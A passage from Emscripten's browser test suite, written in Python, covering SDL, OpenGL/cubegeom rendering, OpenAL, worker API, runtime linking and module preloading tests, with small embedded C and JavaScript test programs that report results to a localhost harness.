self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_test_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_test_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
